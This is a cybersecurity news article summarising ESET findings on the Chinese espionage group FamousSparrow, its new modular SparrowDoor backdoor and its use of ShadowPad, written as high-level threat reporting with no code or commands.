Chinese FamousSparrow hackers deploy upgraded malware in attacks

A China-linked cyberespionage group known as ‘FamousSparrow’ was observed using a new modular version of its signature backdoor ‘SparrowDoor’ against a US-based trade organization.

The activity and new malware version were observed by security researchers at ESET, who found evidence the threat actor has been more active than initially thought since its last operations were exposed in 2022.

Apart from the financial organization, other recent attacks ESET uncovered and linked to FamousSparrow include a Mexican research institute and a government institution in Honduras.

In all these cases, initial access was achieved via exploitation of outdated Microsoft Exchange and Windows Server endpoints, infecting them with webshells.

New modular SparrowDoor

ESET’s investigation actually uncovered two new versions of the SparrowDoor backdoor.

The first is similar to a backdoor Trend Micro attributed to ‘Earth Estries,’ featuring better code quality, improved architecture, encrypted configuration, persistence mechanisms, and stealthy command-and-control (C2) switching.

A key new feature that applies to both new versions is parallel command execution, where the backdoor can continue listening for incoming commands and processing them while it executes previous ones.

“Both versions of SparrowDoor used in this campaign constitute considerable advances in code quality and architecture compared to older ones,” reads the ESET report.

“The most significant change is the parallelization of time-consuming commands, such as file I/O and the interactive shell. This allows the backdoor to continue handling new commands while those tasks are performed.”

The most recent variant constitutes the most significant updates, as it’s a modular backdoor featuring a plugin-based architecture.

It can receive new plugins from the C2 at runtime, which are loaded entirely in memory, expanding its operational capabilities while remaining evasive and stealthy.

The operations these plugins support include:

• Shell access
• File system manipulation
• Keylogging
• Proxying
• Screenshot capturing
• File transfer
• Process listing/killing

The ShadowPad connection

Another interesting finding in ESET’s report is FamousSparrow’s use of ShadowPad, a versatile modular remote access trojan (RAT) associated with several Chinese APTs.

In the attacks observed by the researchers, ShadowPad was loaded via DLL side-loading using a renamed Microsoft Office IME executable, injected into the Windows media player (wmplayer.exe) process, and connected to a known C2 server associated with the RAT.

This indicates that FamousSparrow may now have access to high-tier Chinese cyber tools, like other state-sponsored actors.

ESET notes that Microsoft groups FamousSparrow, GhostEmperor, and Earth Estries under one threat cluster they call Salt Typhoon.

Given the lack of technical evidence to support this, ESET tracks them as distinct groups. However, it admits there are code similarities in their tools, similar exploitation techniques, and some infrastructure reuse.

ESET explains these overlaps as signs of a shared third-party supplier, aka a “digital quartermaster,” that hides behind and supports all these Chinese threat groups.

Based on an analysis of 14M malicious actions, discover the top 10 MITRE ATT&CK techniques behind 93% of attacks and how to defend against them.

Read the Red Report 2025